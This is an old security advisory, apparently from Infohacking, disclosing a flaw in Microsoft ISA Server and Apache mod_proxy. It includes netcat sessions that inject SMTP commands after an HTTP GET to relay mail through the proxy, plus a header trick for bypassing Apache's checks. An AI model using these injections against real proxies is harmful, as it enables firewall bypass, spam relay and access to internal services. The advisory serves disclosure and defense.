-------------------------------------------------------
Once again, a pentest revealed some security flaws on well known software.
This time I found a way to bypass a Microsoft ISA Server
Firewall/proxy. Other proxies seem to be vulnerable.
--- THE FLAW ---
It is possible to bypass the ISA proxy to reach non HTTP based services.
On the next example you can see how is it possible to get the banner
of an SMTP server through the ISA.
C:\>nc -vv X.X.X:X 8080
Warning: forward host lookup failed XXXXX: h_er
rno 11004: NO_DATA
XXXXX [X.X.X.X] 8080 (?) open
GET http://Y.Y.Y.Y:25 HTTP/1.0
220 XXXXXX ESMTP Service (Lotus Domino Release 5.0.6a) ready at Fri, 12 Jun 2004 17:08:26 +0200
This is a simple example, but looking at the next one will give you the key to understand
why this is a security flaw.
Now I connect to a POP3 service through the M$ ISA:
C:\>nc -vv X.X.X.X 8080
Warning: forward host lookup failed for XXX: h_er
rno 11004: NO_DATA
XXXXXXX [X.X.X.X] 8080 (?) open
GET http://Y.Y:Y:Y:110 HTTP/1.0
+OK Lotus Notes POP3 server version X2.0 ready on XXX.
-ERR Unknown command: "GET / HTTP/1.0"
-ERR Unknown command: "Via: 1.0 PROXY"
-ERR Unknown command: "Host: Y.Y.Y.Y:110"
-ERR Unknown command: "Connection: Keep-Alive"
-ERR Unknown command: ""
^C
C:\>
As you can see, ISA http headers are being interpreted by the end server as commands...
So, what will happen if we append commands just after our GET request string?
C:\>nc -vv X.X.X.X 8080
Warning: forward host lookup failed for XXX: h_er
rno 11004: NO_DATA
XXX [X.X.X.X] 8080 (?) open
GET http://Y.Y.Y.Y:25 HTTP/1.0
helo condor
mail from:<bla@foo.com>
rcpt to:<bla@somesite.com>
data
It works!
.
quit
220 XXX ESMTP Service (Lotus Domino Release 5.0.6a) ready at Fri, 12 Jun 2004 18:17:15 +0200
500 Syntax error, command "GET / HTTP/1.0" unrecognized
500 Syntax error, command "Via: 1.0 PROXY" unrecognized
500 Syntax error, command "Host: Y.Y.Y.Y:25" unrecognized
250 XXX Hello condor ([Y.Y.Y.Y]), pleased to meet you
250 bla@foo.com... Sender OK
250 bla@somesite.com... Recipient OK
354 Enter message, end with "." on a line by itself
250 Message accepted for delivery
221 XXX SMTP Service closing transmission channel
sent 141, rcvd 597: NOTSOCK
C:\>
Yes, so here you have an example on how this can be exploited. Blocking access
to non standard HTTP ports is not always possible, so the solution seems to be doing
some kind of HTTP protocol inspection.
It is known that other proxies are "vulnerable". As an example, Apache mod_proxy seems
to be affected (thanks to Ripe from www.7a69zine.org for checking this). Anyway, there's
a litle problem: Apache proxy checks for the presence of ":" in all headers... (thanks
to Lluis Mora from Sentryware). Ripe told me that he tricks the proxy by using
a "Content-Lengh", where he can inject the commands to be interpreted by the SMTP server.
Other proxies may be affected by this problem. Also other attack vectors exist by
exploiting this flaw, like the possibility of accessing services other than SMTP.
Bugtraq was notified by Infohacking on 19-06-04 regarding ISA flaw.
Apache.org was notified by 7a69zine.org on 26-06-04.
In the case of Apache team, the response to 7a69zine crew was very fast and they confirmed
the problem but it does not seem to exist an easy way to patch it at the moment.
-------------------------------------------------------
INFOHACKING_RESEARCH_DIRECTORY
GO_TO_INDEX!
